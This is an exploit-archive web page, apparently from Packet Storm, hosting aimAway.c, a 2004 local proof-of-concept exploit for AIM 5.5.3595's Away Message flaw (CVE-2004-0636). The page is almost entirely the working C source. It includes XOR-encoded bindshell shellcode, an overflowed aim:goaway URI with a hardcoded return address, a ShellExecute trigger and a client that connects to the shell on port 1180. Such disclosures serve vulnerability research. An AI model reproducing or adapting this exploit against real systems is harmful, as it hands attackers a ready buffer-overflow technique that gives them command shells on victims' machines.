exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

aimAway.c

aimAway.c
Posted Aug 14, 2004
Authored by mandragore

Local proof of concept exploit for AIM 5.5.3595 that makes use of the Away Message vulnerability. Binds a shell to port 1180.

tags | exploit, shell, local, proof of concept
advisories | CVE-2004-0636
SHA-256 | 1e6d4bb64f8f6ded58619d8f030cb808e1322f3259b38f11c15015cfad30f9ba

aimAway.c

Change Mirror Download
/*

subject: local PoC exploit for AIM 5.5.3595

vendor: http://www.aim.com
cve: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0636
credits: Matt Murphy
date: 10 August 2004

notes: exploits localy if an argument is supplied, otherwise prints the url.
offsets are based on exe/dll provided in the package, so it should be NT universal.
shellcode makes a bindshell on port 1180.

greets: roSec - Romanian Security Research - www rosec info

author: mandragore

*/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32.lib")

#define GPA 0x004040a4
#define LLA 0x00404088

#define fatal(x) { perror(x); exit(1); }

unsigned char bsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0x57,0xD7,0x60,0xDE,0xFE,0x9E,0xDE,0xB6,0xED,
0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,0x9E,0xDE,0x49,
0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0xB4,0x90,0x89,0x21,0xC8,0x21,0x0E,
0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xDA,0x42,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0xB4,0xDC,
0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0xB4,0xD3,0x89,0x21,0xC8,0x21,0x0E,0xB4,
0xDE,0x8A,0x8D,0xB4,0xDF,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,
0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,
0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,
0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,
0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,
0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,
0xAE,0xD6,0x21,0xC8,0x21,0x0E
};

char *uri="aim:goaway?message=";

unsigned char smalljmp[]={ 0xeb, 0x08 };

void client2serv(unsigned int s) {
char buff[4096];

for (;;) {
fgets(buff,4096,stdin);
send(s,buff,strlen(buff),0);
}
}

void sh() {
int ret;
long s;
WSADATA wsa;
struct sockaddr_in sin;
char buff[4096];
fd_set fds;
long host=0x0100007f;

WSAStartup(0x202,&wsa);

sin.sin_family=2;
sin.sin_port=htons(1180);
sin.sin_addr = *(struct in_addr *)&host;

s=socket(2,1,6);
if ( ret=connect(s,(struct sockaddr *)&sin,16) != 0) {
fatal("[-] damn.. it looks like it failed\n");
} else
printf("[+] connected.\n\n");

CreateThread(0,0,(void *)client2serv,(long *)s,0,0);

for (;;) {
FD_ZERO(&fds);
FD_SET(s,&fds);

if (select(s+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select()");

if (FD_ISSET(s,&fds)) {
if ( (ret = recv(s,buff,4096,0)) < 1 )
fatal("[-] shell.recv()");
memset(buff+ret,0,1);
printf("%s",buff);
}
}

}

void fixsh() {
int gpa=GPA^0xdededede, lla=LLA^0xdededede;
memcpy(bsh+0x1a,&gpa,4);
memcpy(bsh+0x2b,&lla,4);
}

int main(int argc, char **argv) {
char *t;
int retaddr=0x10015599; // call ebx from rtvideo.dll, should be stable

fixsh();

t=GlobalAlloc(0x40,2000);
memset(t,0x41,1500);
strncpy(t,uri,strlen(uri));
memcpy(t+1037-4,&smalljmp,2);
memcpy(t+1037,&retaddr,4);
memcpy(t+1037+4+4,&bsh,sizeof(bsh));

if (argc==1) {
printf("%s\n",t);
return 0;
}

printf("[+] sending request..\n");

ShellExecute(0,"open",t,0,0,SW_SHOW);

printf("[%%] let's sleep 5secs..\n");

Sleep(5000);

sh();

return 0;
}
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close